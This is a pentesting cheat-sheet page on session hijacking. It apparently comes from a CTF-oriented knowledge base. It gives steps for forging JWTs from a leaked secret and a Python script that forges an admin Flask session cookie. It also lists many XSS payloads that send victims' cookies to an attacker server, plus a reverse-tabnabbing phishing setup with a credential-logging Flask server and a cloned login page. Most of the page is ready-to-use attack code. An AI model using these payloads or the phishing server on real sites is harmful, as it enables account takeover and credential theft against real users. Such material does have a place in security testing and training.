search
Page cover
githubEdit

face-dottedSession Hijacking

chevron-rightClient-Side JWT Attackhashtag
circle-info

If there are no cookies being generated before register or login is quite possible that the authorization process in being handled Clint-Side

circle-info

Enumeration

  1. Go to WebDev Browser and look within the lib folder to find the file relate to JWT, normally is called jwt.js or jwt.ts

  2. Look for the JWT_SECRET and the signing methods

  3. Use jwt.ioarrow-up-right or JWT Editor extension from Burp Suite to craft a new token signed with the secret and give it the admin role.

chevron-rightForge Flask Session Cookiehashtag

If you got the SECRET_KEY and the session data you may be able to forge a malicious cookie

from flask import Flask
from flask.sessions import SecureCookieSessionInterface
import hashlib

app = Flask(__name__)
app.secret_key = '948bc3cddc2fc42fcc5bb230b17ae23f0181ee62d0502d9d069af9099406c5d9'

# Create a malicious session
session_data = {
    'user': 'admin',
    'role': 'administrator',
    'is_admin': True
}

# Generate the session cookie
session_interface = SecureCookieSessionInterface()
session_cookie = session_interface.get_signing_serializer(app).dumps(session_data)
print(session_cookie)
chevron-rightStealing Cookies via XSShashtag
circle-info

Error-Based Cookie Stealing

  • Trigger & manipulate Error Events

Basic image error trigger
<img src=x onerror=this.src="http://<YOUR_SERVER_IP>/?c="+document.cookie>
Using document.location
<img src=1 onerror="document.location='http://<YOUR_SERVER_IP>/'+ document.cookie">
Redirect
<img src=x onerror="location.href='http://<YOUR_SERVER_IP>/?c='+ document.cookie">
// Some code
circle-info

Image-Based Cookie Stealing

Image object via script
<script>new Image().src="http://<IP>/?c="+encodeURI(document.cookie);</script>
Variable assignment method
<script>var i=new Image(); i.src="<YOUR_SERVER_IP>/?c="+document.cookie;</script>
circle-info

Location-Based Cookie Stealing

Basic location redirect
<script>location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
Alternative location syntax
<script>location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
Document location method
<script>document.location = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
Document location method + Redirect
<script>document.location.href = 'http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie</script>
Window location method
<script>window.location.assign('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
Window location method Dynamically
<script>window['location']['assign']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
Window location method + Redirect
<script>window['location']['href']('http://<YOUR_SERVER_IP>/Stealer.php?cookie='+document.cookie)</script>
String concatenation methods (dynamically join the URL and cookies to redirect)
<script>document.location=["http://<YOUR_SERVER_IP>?c",document.cookie].join()</script>
Location + redirect with concatenation of cookies
<script>window.location="https://<SERVER_IP>/?c=".concat(document.cookie)</script>
circle-info

Advanced Cookie Stealing Methods

Audio object method
<script>new Audio().src="http://<IP>/?c="+escape(document.cookie);</script>
Document write method
<script>document.write('<img src="http://<YOUR_SERVER_IP>?c='+document.cookie+'" />')</script>
XMLHttpRequest method
<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
Fetch API method to avoid response handling:
<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
SendBeacon API (stealthier)
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
circle-info

DOM-Stored Cookie Extraction

Extract cookies stored in DOM elements
window.addEventListener('DOMContentLoaded', function(e) {
    window.location = "http://10.10.16.8:4444/?tokyo=" + encodeURI(document.getElementsByName("cookie")[0].value)
})
chevron-rightReverse Tabnabbinghashtag

Documentationarrow-up-right and original Writeuparrow-up-right

circle-info

If the link uses target="_blank" and doesn’t include rel="noopener" or rel="noreferrer", the new tab gets access to the original page via the window.opener object.

Vulnerable link
<a href="https://attacker-site.com" target="_blank">View article</a>
On the attacker site 
window.opener.location = 'https://phishing-site.com/login';
circle-info

Craft the phishing attack

Set up a Flask web server:
from flask import Flask, request, render_template
app = Flask(__name__)
@app.route('/writeup.html', methods=['GET'])
def writeup():
return render_template('writeup.html')
@app.route('/accounts/login/', methods=['GET','POST'])
def login():
if request.method == "POST":
username = request.form.get('login')
password = request.form.get('password')
print("Got username and password: {}:{}".format(username,password))
return render_template('login.html')
else:
return render_template('login.html')
app.run(host="10.10.14.172",port=8000)
Altered the .html file to redirect to own version of login.html
<!doctype html>
<html>
Example Writeup
<script>
if (window.opener)
window.opener.parent.location.replace('http://10.10.14.172/accounts/login/');
if (window.parent != window)
window.parent.location.replace('http://10.10.14.172/accounts/login/');
</script>
</html>
Clone the login page for the platform:
wget http://developer.htb/accounts/login/ -O templates/login.html

  • Change the CSS and JS imports to point to a more credible site.

  • Just lunch the attack submitting the .html file

PreviousPrototype PollutionNextTemplate Manipulation

Last updated